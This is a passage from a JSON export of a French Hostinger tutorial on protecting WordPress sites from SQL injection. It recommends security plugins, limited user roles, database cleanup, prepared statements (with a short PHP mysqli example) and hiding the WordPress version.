d&eacute;tecter et r&eacute;soudre les probl&egrave;mes de s&eacute;curit&eacute; gr&acirc;ce aux rapports en temps r&eacute;el.<\/p><p><strong>Prix <\/strong>: Vous pouvez t&eacute;l&eacute;charger MalCare gratuitement. Si vous avez besoin d&rsquo;un nettoyeur de logiciels malveillants automatis&eacute; ou de l&rsquo;aide d&rsquo;experts en s&eacute;curit&eacute;, le <a href=\"https:\/\/www.malcare.com\/pricing\/\" target=\"_blank\" rel=\"noopener\"><strong>plugin premium<\/strong><\/a> commence &agrave; <strong>99 $\/an<\/strong>.<\/p><p><strong>Jetpack<\/strong><\/p><p><a href=\"https:\/\/wordpress.org\/plugins\/jetpack\/\" target=\"_blank\" rel=\"noopener\"><strong>Jetpack<\/strong><\/a> peut &ecirc;tre une option efficace si vous recherchez un plugin tout-en-un que vous pouvez utiliser pour g&eacute;rer les performances de votre site. Cet outil vous permet de renforcer la s&eacute;curit&eacute;, le marketing, la conception et la <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/optimiser-wordpress\/\"><strong>vitesse du site<\/strong><\/a>.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"332\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Jetpack.png\/public\" alt=\"banni&egrave;re du plugin Jetpack WordPress \" class=\"wp-image-37100\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Jetpack.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Jetpack.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Jetpack.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Jetpack.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p><strong>Caract&eacute;ristiques <\/strong>:<\/p><ul class=\"wp-block-list\">\n<li>Sauvegardes automatiques<\/li>\n\n\n\n<li>Analyse des logiciels malveillants<\/li>\n\n\n\n<li>Pr&eacute;vention des attaques par force brute<\/li>\n\n\n\n<li>Surveillance des temps d&rsquo;arr&ecirc;t (ou d&rsquo;indisponibilit&eacute;)<\/li>\n<\/ul><p>Vous pouvez surveiller en permanence votre site web pour d&eacute;tecter toute injection SQL potentielle gr&acirc;ce &agrave; l&rsquo;analyse des logiciels malveillants. &Agrave; titre pr&eacute;ventif, vous pouvez sauvegarder les fichiers de votre site et ainsi facilement r&eacute;cup&eacute;rer les donn&eacute;es apr&egrave;s une attaque.<\/p><p>Jetpack peut &eacute;galement am&eacute;liorer la diffusion de votre contenu car il est fourni avec un CDN gratuit qui <strong>optimise automatiquement vos images <\/strong>pour un chargement rapide. En d&rsquo;autres termes, vous prot&eacute;gez votre site web des injections SQL et vous vous assurez que les visiteurs b&eacute;n&eacute;ficient d&rsquo;une bonne exp&eacute;rience.<\/p><p><strong>Prix <\/strong>: Jetpack est un plugin WordPress gratuit. <a href=\"https:\/\/cloud.jetpack.com\/pricing\" target=\"_blank\" rel=\"noopener\"><strong>Jetpack Security<\/strong><\/a> commence &agrave;<strong> 10 $\/mois<\/strong> pour la d&eacute;tection des logiciels malveillants en temps r&eacute;el et les sauvegardes.<\/p><h3 class=\"wp-block-heading\" id=\"h-6-limitez-les-privileges-d-acces-des-utilisateurs\"><strong>6. Limitez les privil&egrave;ges d&rsquo;acc&egrave;s des utilisateurs<\/strong><\/h3><p>Vous pouvez attribuer diff&eacute;rents <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/role-wordpress\"><strong>r&ocirc;les aux utilisateurs<\/strong><\/a> dans WordPress. En tant qu&rsquo;administrateur, vous pouvez permettre &agrave; quelqu&rsquo;un de devenir &eacute;diteur, auteur, contributeur, abonn&eacute;, administrateur ou super administrateur..<\/p><p>Cependant, il est souvent pr&eacute;f&eacute;rable de limiter le nombre d&rsquo;utilisateurs ayant acc&egrave;s &agrave; votre site web. Cela peut vous aider &agrave; r&eacute;duire la probabilit&eacute; d&rsquo;une attaque par injection SQL sur WordPress.<\/p><ul class=\"wp-block-list\">\n<li>Allez dans <strong>Utilisateurs &rarr; Tous les utilisateurs<\/strong> dans votre tableau de bord WordPress pour g&eacute;rer les utilisateurs et leurs r&ocirc;les. Lorsqu&rsquo;un utilisateur est s&eacute;lectionn&eacute;, cliquez sur <strong>Modifier<\/strong>.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"357\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-fr.png\/public\" alt=\"Modifier tous les utilisateurs dans le tableau de bord de WordPress\" class=\"wp-image-26947\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Trouvez ensuite le param&egrave;tre <strong>R&ocirc;le<\/strong>. Ici, vous pouvez limiter le niveau de contr&ocirc;le de l&rsquo;utilisateur sur votre site web. S&rsquo;il s&rsquo;agit d&rsquo;un administrateur, vous pouvez envisager de le r&eacute;trograder au rang de contributeur, d&rsquo;auteur ou de r&eacute;dacteur.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-settings-fr.png\/public\" alt=\"R&eacute;glages des r&ocirc;les dans le tableau de bord de WordPress\" class=\"wp-image-26948\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-settings-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-settings-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-settings-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-users-settings-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Si un utilisateur ne contribue pas actuellement &agrave; votre contenu, vous pouvez le supprimer compl&egrave;tement. Vous &eacute;liminerez ainsi les vuln&eacute;rabilit&eacute;s potentielles et s&eacute;curiserez davantage votre site web.<\/p><h3 class=\"wp-block-heading\" id=\"h-7-supprimez-les-fonctionnalites-inutiles-de-la-base-de-donnees\"><strong>7. Supprimez les fonctionnalit&eacute;s inutiles de la base de donn&eacute;es<\/strong><\/h3><p>Vous pouvez envisager de <strong>normaliser votre base de donn&eacute;es<\/strong> si vous souhaitez limiter les risques d&rsquo;attaque par injection SQL. Vous pouvez rendre votre base de donn&eacute;es moins vuln&eacute;rable en &eacute;liminant les fonctions inutiles et le contenu non pertinent.<\/p><p>Le nettoyage de votre base de donn&eacute;es implique g&eacute;n&eacute;ralement d&rsquo;organiser les donn&eacute;es, d&rsquo;&eacute;liminer les redondances et de s&rsquo;assurer que les d&eacute;pendances entre les donn&eacute;es ont un sens. Pour ce faire, vous pouvez installer un plugin comme <a href=\"https:\/\/wordpress.org\/plugins\/wp-optimize\/\" target=\"_blank\" rel=\"noopener\"><strong>WP-Optimize<\/strong><\/a>.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"331\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/WP-Optimize.png\/public\" alt=\"WP-Optimize un plugin WordPress \" class=\"wp-image-37101\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/WP-Optimize.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/WP-Optimize.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/WP-Optimize.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/WP-Optimize.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Apr&egrave;s avoir install&eacute; et activ&eacute; WP-Optimize, vous disposerez d&rsquo;une gamme compl&egrave;te d&rsquo;options d&rsquo;optimisation pour la base de donn&eacute;es. Au lieu d&rsquo;ex&eacute;cuter manuellement des commandes SQL, vous pourrez alors simplement cocher la case situ&eacute;e &agrave; c&ocirc;t&eacute; d&rsquo;un param&egrave;tre particulier.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"697\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-wpoptimize-fr.png\/public\" alt=\"Le plugin WordPress WP-Optimize est install&eacute; et activ&eacute;\" class=\"wp-image-26949\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-wpoptimize-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-wpoptimize-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-wpoptimize-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/wpadmin-wpoptimize-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>C&rsquo;est l&rsquo;un des moyens les plus simples d&rsquo;optimiser les tables de la base de donn&eacute;es et de supprimer les donn&eacute;es inutiles telles que les articles supprim&eacute;s. En retour, cela peut rendre votre site Web plus s&ucirc;r contre les injections SQL.<\/p><h3 class=\"wp-block-heading\" id=\"h-8-utilisez-des-instructions-preparees\"><strong>8. Utilisez des instructions pr&eacute;par&eacute;es<\/strong><\/h3><p>Une instruction pr&eacute;par&eacute;e est un mod&egrave;le de code SQL qui est ensuite personnalis&eacute; avec des param&egrave;tres variables. Lorsque la base de donn&eacute;es re&ccedil;oit ce mod&egrave;le, elle enregistre un plan d&rsquo;ex&eacute;cution de la requ&ecirc;te, les donn&eacute;es sont par la suite li&eacute;es aux param&egrave;tres, ce qui permet d&rsquo;ex&eacute;cuter l&rsquo;instruction.<\/p><p>En &eacute;crivant des instructions pr&eacute;par&eacute;es, les attaquants SQLi ne pourront pas modifier l&rsquo;intention de la requ&ecirc;te. Voici &agrave; quoi peut ressembler une instruction pr&eacute;par&eacute;e :<\/p><pre class=\"wp-block-preformatted\">$stmt = $mysqli-&gt;prepare(&ldquo;SELECT * FROM users WHERE user = ? AND password = ?&rdquo;);\n\n$stmt-&gt;bind_param(&ldquo;ss&rdquo;, $username, $password);\n\n$stmt-&gt;execute();<\/pre><p>Comme vous pouvez le constater, cette m&eacute;thode n&rsquo;int&egrave;gre pas directement les donn&eacute;es de l&rsquo;utilisateur. Si vous utilisiez une requ&ecirc;te dynamique &agrave; la place, les pirates pourraient ins&eacute;rer des commandes SQL pour modifier la requ&ecirc;te et acc&eacute;der &agrave; des informations critiques de la base de donn&eacute;es.<\/p><p>Cependant, l&rsquo;utilisation d&rsquo;une instruction pr&eacute;par&eacute;e peut emp&ecirc;cher l&rsquo;injection SQL. En pr&eacute;compilant une requ&ecirc;te et en ajoutant des donn&eacute;es utilisateur ult&eacute;rieurement, vous pouvez vous assurer que la requ&ecirc;te d&rsquo;origine ne puisse pas &ecirc;tre modifi&eacute;e.<\/p><h3 class=\"wp-block-heading\" id=\"h-9-cachez-votre-version-de-wordpress\"><strong>9. Cachez votre version de WordPress<\/strong><\/h3><p>Le fait que des personnes puissent identifier la version de WordPress que vous utilisez peut rendre votre site web plus vuln&eacute;rable aux attaques par injection SQL. En effet, comme chaque version contient des probl&egrave;mes de s&eacute;curit&eacute; uniques, cette information peut aider les attaquants &agrave; trouver un moyen d&rsquo;entrer dans votre base de donn&eacute;es.<\/p><p>Normalement, la version de WordPress est affich&eacute;e dans l&rsquo;en-t&ecirc;te de votre site web :<\/p><pre class=\"wp-block-preformatted\">&lt;meta name=\"generator\" content=\"WordPress 6.0.1\" \/&gt;<\/pre><p>En cachant cette information, vous pouvez rendre plus difficile l&rsquo;exploitation de votre site par des attaquants SQLi.<\/p><ul class=\"wp-block-list\">\n<li>Vous devrez acc&eacute;der aux fichiers de votre site et aller dans <strong>public_html &rarr; wp-content &rarr; themes<\/strong>.<\/li>\n<\/ul><figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"257\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-fr.png\/public\" alt=\"Le dossier Themes dans le gestionnaire de fichiers de Hostinger\" class=\"wp-image-24351\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><ul class=\"wp-block-list\">\n<li>S&eacute;lectionnez le th&egrave;me que vous utilisez actuellement. Dans ce dossier, ouvrez le fichier <strong>functions.php<\/strong>.<\/li>\n<\/ul><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" width=\"1024\" height=\"391\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-functionsphp-edit-fr.png\/public\" alt=\"Le fichier functions.php sur le gestionnaire de fichiers Hostinger. Le bouton Modifier est mis en &eacute;vidence\" class=\"wp-image-24359\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-functionsphp-edit-fr.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-functionsphp-edit-fr.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-functionsphp-edit-fr.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/06\/hpanel-filemanager-publichtml-wpcontent-themes-functionsphp-edit-fr.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><ul class=\"wp-block-list\">\n<li>Copiez et collez le code suivant :<\/li>\n<\/ul><p>remove_action(&lsquo;wp_head&rsquo;, &lsquo;wp_generator&rsquo;);<\/p><ul class=\"wp-block-list\">\n<li>Enregistrez vos modifications.<\/li>\n<\/ul><p>Cela supprimera le num&eacute;ro de version de WordPress de l&rsquo;en-t&ecirc;te HTTP. Maintenant, vous n&rsquo;avez plus &agrave; vous soucier que des pirates trouvent des vuln&eacute;rabilit&eacute;s dans votre logiciel de base !<\/p><h2 class=\"wp-block-heading\" id=\"h-comment-supprimer-une-injection-sql-de-votre-site-web\"><strong>Comment supprimer une injection SQL de votre site web<\/strong><\/h2><p>M&ecirc;me apr&egrave;s avoir pris toutes les pr&eacute;cautions n&eacute;cessaires, votre site web peut toujours &ecirc;tre victime d&rsquo;une attaque par injection SQL. Cela peut avoir plusieurs cons&eacute;quences :<\/p><ul class=\"wp-block-list\">\n<li>La mise sur liste noire de votre site web par Google<\/li>\n\n\n\n<li>Des probl&egrave;mes de performance, comme la lenteur des pages<\/li>\n\n\n\n<li>L&rsquo;apparition de code cass&eacute; sur les pages web<\/li>\n\n\n\n<li>Des fen&ecirc;tres pop-up de spam<\/li>\n\n\n\n<li>Le contenu redirige vers un autre site web<\/li>\n\n\n\n<li>Du spam dans les r&eacute;sultats de recherche de votre site<\/li>\n<\/ul><p>Lorsque cela se produit, vous pouvez utiliser diff&eacute;rentes m&eacute;thodes pour nettoyer votre site. Vous pouvez <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/supprimer-malware-wordpress\"><strong>supprimer les logiciels malveillants<\/strong><\/a> manuellement si vous avez l&rsquo;habitude de modifier les fichiers de votre site. Cependant, vous pouvez &eacute;galement installer un plugin pour effectuer cette t&acirc;che automatiquement.<\/p><p><a href=\"https:\/\/wordpress.org\/plugins\/wordfence\/\" target=\"_blank\" rel=\"noopener\"><strong>Wordfence Security<\/strong><\/a> est un plugin WordPress gratuit qui comprend un scanner de logiciels malveillants. Il &eacute;value vos fichiers, th&egrave;mes et plugins et vous alerte lorsqu&rsquo;il d&eacute;tecte des logiciels malveillants, des redirections malveillantes ou des injections de code.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1024\" height=\"332\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Wordfence-Security-WordPress-plugin.png\/public\" alt=\"Banni&egrave;re web du plugin WordPress Wordfence Security\" class=\"wp-image-37102\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Wordfence-Security-WordPress-plugin.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Wordfence-Security-WordPress-plugin.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Wordfence-Security-WordPress-plugin.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2023\/09\/Wordfence-Security-WordPress-plugin.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>En outre, Wordfence Security offre un pare-feu WordPress.Une fois que vous aurez &eacute;limin&eacute; tout probl&egrave;me li&eacute; &agrave; une injection SQL, le pare-feu pourra efficacement pr&eacute;venir les futures atteintes &agrave; la s&eacute;curit&eacute;.<\/p><p>Il est &eacute;galement conseill&eacute; de contacter votre <a href=\"https:\/\/www.hostinger.com\/fr\/hebergement-web\"><strong>h&eacute;bergeur<\/strong><\/a>. Si vous utilisez un plan d&rsquo;h&eacute;bergement mutualis&eacute;, l&rsquo;injection SQL pourrait avoir affect&eacute; d&rsquo;autres sites sur votre serveur.<\/p><div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/www.hostinger.com\/fr\/hebergement-wordpress\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"300\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/public\" alt=\"\" class=\"wp-image-41453\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-New-WP_in-text-banner.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><\/div><h2 class=\"wp-block-heading\" id=\"h-conclusion\"><strong>Conclusion<\/strong><\/h2><p>Les attaquants SQLi peuvent utiliser des instructions SQL malveillantes pour p&eacute;n&eacute;trer dans votre base de donn&eacute;es et l&rsquo;exploiter. Bien qu&rsquo;il s&rsquo;agisse d&rsquo;un probl&egrave;me courant pour les sites web WordPress, il est relativement facile de supprimer tout logiciel malveillant qui a &eacute;t&eacute; inject&eacute;. Cependant, vous pouvez mettre en &oelig;uvre des mesures de s&eacute;curit&eacute; pour pr&eacute;venir les attaques futures et prot&eacute;ger vos donn&eacute;es.<\/p><p>Pour r&eacute;capituler, voici comment vous pouvez pr&eacute;venir l&rsquo;injection SQL sur WordPress :<\/p><ul class=\"wp-block-list\">\n<li>Mettez en place un pare-feu avec Cloudflare.<\/li>\n\n\n\n<li>Changez le pr&eacute;fixe de la <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/wordpress-base-de-donnees\"><strong>base de donn&eacute;es de WordPress<\/strong><\/a>.<\/li>\n\n\n\n<li>Validez les entr&eacute;es des utilisateurs.<\/li>\n\n\n\n<li>Effectuez des mises &agrave; jour fr&eacute;quentes.<\/li>\n\n\n\n<li>Installez un plugin d&rsquo;injection SQL comme Sucuri Security.<\/li>\n\n\n\n<li>Limitez les privil&egrave;ges d&rsquo;acc&egrave;s des utilisateurs.<\/li>\n\n\n\n<li>Supprimez les fonctionnalit&eacute;s inutiles de la base de donn&eacute;es avec WP-Optimize.<\/li>\n\n\n\n<li>Utilisez des instructions pr&eacute;par&eacute;es.<\/li>\n\n\n\n<li>Cachez votre version de WordPress.<\/li>\n<\/ul><p>Vous devriez maintenant avoir un site web enti&egrave;rement s&eacute;curis&eacute; qui n&rsquo;est plus vuln&eacute;rable aux attaques par injection SQL !<\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&rsquo;un des facteurs les plus critiques dans le d&eacute;veloppement d&rsquo;un site web est sa s&eacute;curit&eacute;. Si votre site subit une injection SQL WordPress, des pirates pourraient acc&eacute;der &agrave; des informations sensibles dans votre base de donn&eacute;es et les exploiter. Heureusement, la pr&eacute;vention des attaques par injection SQL est plus simple que vous ne le pensez. [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"\/fr\/tutoriels\/injection-sql-wordpress\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":335,"featured_media":26952,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"rank_math_title":"Comment Pr\u00e9venir une Attaque Injection SQL sur WordPress","rank_math_description":"Une injection SQL est un code malveillant qui est utilis\u00e9 pour ins\u00e9rer des instructions SQL malveillantes. Apprenez-en plus sur ce guide","rank_math_focus_keyword":"injection sql wordpress","footnotes":""},"categories":[4777],"tags":[],"class_list":["post-26815","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wordpress"],"hreflangs":[{"locale":"en-US","link":"https:\/\/www.hostinger.com\/tutorials\/wordpress-sql-injection","default":0},{"locale":"fr-FR","link":"https:\/\/www.hostinger.com\/fr\/tutoriels\/injection-sql-wordpress","default":0},{"locale":"en-UK","link":"https:\/\/www.hostinger.com\/uk\/tutorials\/wordpress-sql-injection\/","default":0},{"locale":"en-MY","link":"https:\/\/www.hostinger.com\/my\/tutorials\/wordpress-sql-injection\/","default":0},{"locale":"en-PH","link":"https:\/\/www.hostinger.com\/ph\/tutorials\/wordpress-sql-injection\/","default":0},{"locale":"en-IN","link":"https:\/\/www.hostinger.com\/in\/tutorials\/wordpress-sql-injection\/","default":0},{"locale":"en-CA","link":"https:\/\/www.hostinger.com\/ca\/tutorials\/wordpress-sql-injection\/","default":0},{"locale":"en-AU","link":"https:\/\/www.hostinger.com\/au\/tutorials\/wordpress-sql-injection\/","default":0},{"locale":"en-NG","link":"https:\/\/www.hostinger.com\/ng\/tutorials\/wordpress-sql-injection","default":0}],"_links":{"self":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts\/26815","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/users\/335"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/comments?post=26815"}],"version-history":[{"count":7,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts\/26815\/revisions"}],"predecessor-version":[{"id":37103,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts\/26815\/revisions\/37103"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/media\/26952"}],"wp:attachment":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/media?parent=26815"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/categories?post=26815"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/tags?post=26815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}